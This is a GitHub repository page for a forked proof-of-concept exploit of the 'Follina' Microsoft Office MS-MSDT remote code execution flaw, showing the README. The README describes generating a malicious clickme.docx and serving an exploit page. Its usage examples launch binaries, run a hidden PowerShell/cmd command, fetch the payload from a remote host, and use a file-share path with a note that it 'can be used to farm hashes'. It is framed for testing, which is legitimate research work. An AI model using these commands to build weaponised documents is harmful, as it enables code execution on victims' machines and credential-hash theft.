Skip to content
/ follina.py Public
forked from chvancooten/follina.py

POC to replicate the full 'Follina' Office RCE vulnerability for testing purposes

0 stars 255 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

HectorLee1992/follina.py

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
src
src
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
follina.py
follina.py
 
 

Repository files navigation

'Follina' MS-MSDT n-day Microsoft Office RCE

Quick POC to replicate the 'Follina' Office RCE vulnerability for local testing purposes. Running the script will generate the clickme.docx payload file in your current working directory, and start a web server with the payload file (www/exploit.html). The payload and web server parameters are configurable (see examples).

⚠ DO NOT USE IN PRODUCTION LEST YOU BE REGARDED A DUMMY

Usage:

python .\follina.py -h
usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] [-u URL] [-H HOST] [-p PORT]

options:
  -h, --help            show this help message and exit

Required Arguments:
  -m {command,binary}, --mode {command,binary}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost"
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -p PORT, --port PORT  The port to run the HTTP server on, defaults to 80

Examples:

# Execute a local binary
python .\follina.py -m binary -b \windows\system32\calc.exe

# On linux you may have to escape backslashes
python .\follina.py -m binary -b \\windows\\system32\\calc.exe

# Execute a binary from a file share (can be used to farm hashes 👀)
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe

# Execute an arbitrary powershell command
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

Cool peeps

Thanks to Kevin Beaumont for his original analysis of the issue, @KevTheHermit for sharing their poc, and John Hammond for their further work on analysing payload requirements. Additional thanks to @mkolsek for the template supporting Office 2019, and @theluemmel for sharing their version of the payload with me.

About

POC to replicate the full 'Follina' Office RCE vulnerability for testing purposes

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Smarty 60.2%
  • Python 39.8%